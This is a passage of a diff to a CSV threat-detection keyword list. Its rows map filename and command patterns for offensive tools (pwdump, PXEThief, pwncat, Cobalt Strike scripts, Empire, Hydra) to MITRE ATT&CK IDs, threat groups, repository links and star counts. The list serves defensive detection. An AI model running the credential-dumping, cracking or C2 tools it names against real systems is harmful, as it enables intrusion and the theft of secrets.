APT29","C2","https://github.com/pureqh/bypassAV","1","1","N/A","10","10","434","101","2021-05-18T05:03:03Z","2021-02-25T05:26:11Z" -"*purevpn_cred_collector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*purevpn_cred_collector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*purplepanda.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" "*purplepanda_config.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" "*purplepanda_github.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" "*PURPLEPANDA_NEO4J_URL=*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" "*purplepanda_prints.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" "*PURPLEPANDA_PWD=*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" -"*PurpleSharp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*PurpleSharp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*putterpanda_whoami*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*puttygen.exe FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*puzzlepeaches/NTLMRecon*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*PWCrack*","offensive_tool_keyword","PWCrack","cracking tool for multiple hash type","T1110 - T1111 - T1210 - T1558.002 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","5","456","57","2023-09-27T08:26:21Z","2018-07-01T08:33:55Z" "*pwd*/*/rules/best64.rule*","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with Hashcat","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*pwd_dump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*pwd_dump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*PWDump.*","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1027 - T1055 - T1056 - T1059 - T1078 - T1087 - T1098 - T1110 - T1212 - T1547","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*pwdump.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*-PWDumpFormat*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*pw-inspector -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*pw-inspector.*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*-PWDumpFormat*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*pw-inspector -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*pw-inspector.*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" "*pwn_jenkins*","offensive_tool_keyword","pwn_jenkins","Remote Code Execution for jenkins","T1216 - T1210 - T1573","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gquere/pwn_jenkins","1","0","N/A","N/A","10","1681","298","2023-03-09T09:16:14Z","2018-07-18T14:24:27Z" "*pwn1sher/CS-BOFs*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*pwn1sher/WMEye*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" -"*pwnagotchi*","offensive_tool_keyword","pwnagotchi","Pwnagotchi is an A2C-based AI leveraging bettercap that learns from its surrounding WiFi environment to maximize the crackable WPA key material it captures (either passively. or by performing authentication and association attacks). This material is collected as PCAP files containing any form of handshake supported by hashcat. including PMKIDs. full and half WPA handshakes","T1562.004 - T1040 - T1557.001","TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/evilsocket/pwnagotchi","1","0","N/A","N/A","10","6215","976","2023-07-25T00:15:21Z","2019-09-19T13:07:15Z" +"*pwn3d_label = Pwn3d!*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*pwnagotchi*","offensive_tool_keyword","pwnagotchi","Pwnagotchi is an A2C-based AI leveraging bettercap that learns from its surrounding WiFi environment to maximize the crackable WPA key material it captures (either passively. or by performing authentication and association attacks). This material is collected as PCAP files containing any form of handshake supported by hashcat. including PMKIDs. full and half WPA handshakes","T1562.004 - T1040 - T1557.001","TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/evilsocket/pwnagotchi","1","0","N/A","N/A","10","6219","976","2023-07-25T00:15:21Z","2019-09-19T13:07:15Z" "*pwnat.exe*","offensive_tool_keyword","pwnat","pwnat. by Samy Kamkar. is a tool that allows any client behind a NAT to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other. Simply put. this is a proxy server that works behind a NAT. even when the client is also behind a NAT","T1584 - T1571 - T1210.001","TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/samyk/pwnat","1","0","N/A","N/A","10","2861","456","2023-08-08T05:09:00Z","2012-08-10T05:55:11Z" "*pwncat-cs *:*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*pwncat-cs -lp *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -15385,13 +15554,13 @@ "*pwndrop stop*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwndrop-linux-amd64*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwndrop-master*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" -"*pwned_x64/notepad.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Pwned-creds_Domainpasswordspray.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*pwned_x64/notepad.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Pwned-creds_Domainpasswordspray.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*pwned-passwords-ntlm*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" "*pwnkit *","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*pwnkit64decoded.c*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" "*pwnsauc3/RWXFinder*","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","89","12","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" -"*pwsafe2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pwsafe2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*pxethief *","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","0","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" "*pxethief.py*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" "*pycobalt.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" @@ -15401,13 +15570,14 @@ "*pycobalt_python*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pycobalt_timeout*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*pydictor*","offensive_tool_keyword","pydictor","pydictor A powerful and useful hacker dictionary builder for a brute-force attack","T1110 - T1111 - T1210 - T1558.004","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/LandGrey/pydictor","1","0","N/A","N/A","10","2936","618","2023-01-11T13:02:06Z","2016-08-17T08:16:56Z" -"*pyexec -c *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 